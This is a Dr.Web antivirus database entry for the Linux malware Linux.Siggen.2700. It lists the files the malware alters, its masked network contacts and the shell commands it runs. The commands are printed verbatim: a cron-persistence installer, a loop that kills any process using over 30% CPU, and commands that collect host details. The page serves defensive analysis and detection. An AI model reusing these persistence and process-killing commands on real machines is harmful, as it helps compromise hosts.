マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話(英語)

+7 (495) 789-45-86

Profile

Linux.Siggen.2700

Added to the Dr.Web virus database: 2020-04-18

Virus description added:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Launches processes:
  • sh -c
  • hostname -I
  • awk {print $1}
  • cat /etc/ssh/sshd_config
  • grep Port
  • head -n 1
  • awk {print \":\"$2}
  • whoami
  • hostname
  • grep -c ^processor /proc/cpuinfo
  • cut -d: -f2
  • grep -m 1 model name /proc/cpuinfo
  • sed -e s/$//
  • sed -e s/^ *//
  • sh -c ps -A -osta
  • ps -A -osta
  • awk /[zZ]/ && !a[$2]++ {print $2}
  • id -u
  • ps x
  • grep /etc/cron
  • grep -v grep
  • sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi
  • ps aux
  • grep -v /usr/sbin/httpd
  • grep -v -- -bash[[:space:]]*$
  • awk {if($3>30.0) print $2}
  • sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '<SAMPLE_FULL_PATH>' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'<SAMPLE_FULL_PATH>' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '<SAMPLE_FULL_PATH>$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null
  • rm -rf /root/.cron
  • crontab -l
  • grep -v <SAMPLE_FULL_PATH>
  • grep <SAMPLE_FULL_PATH>$
  • sort
  • wc -l
  • uniq
  • crontab /root/.cron
  • sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi
  • grep -- -bash[[:space:]]*$
Kills the following processes:
  • /bin/ps
Performs operations with the file system:
Modifies file access rights:
  • /var/spool/cron/crontabs/tmp.D4wpRC
Creates or modifies files:
  • /root/.cron
  • /var/spool/cron/.cron
  • /var/spool/cron/crontabs/tmp.D4wpRC
  • /tmp/.lock
Deletes files:
  • /root/.cron
Locks files:
  • /tmp/.lock
Network activity:
Establishes connection:
  • 18#.##.192.135:80
DNS ASK:
  • xm####0.pwndns.pw
Other:
Collects CPU information
Collects RAM information
Collects information about network activity

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number